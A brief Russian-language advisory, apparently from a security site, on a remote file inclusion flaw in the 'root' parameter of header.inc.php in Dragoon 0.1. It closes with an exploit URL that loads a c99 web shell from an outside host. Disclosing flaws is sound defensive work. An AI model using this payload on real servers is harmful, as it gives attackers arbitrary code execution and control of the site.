Программа: Dragoon 0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root» сценарием header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://WwW.4RxH.CoM/PHP/includes/header.inc.php? root=http://rxh.freehostia.com/shells/c99in.txt?



Оставить мнение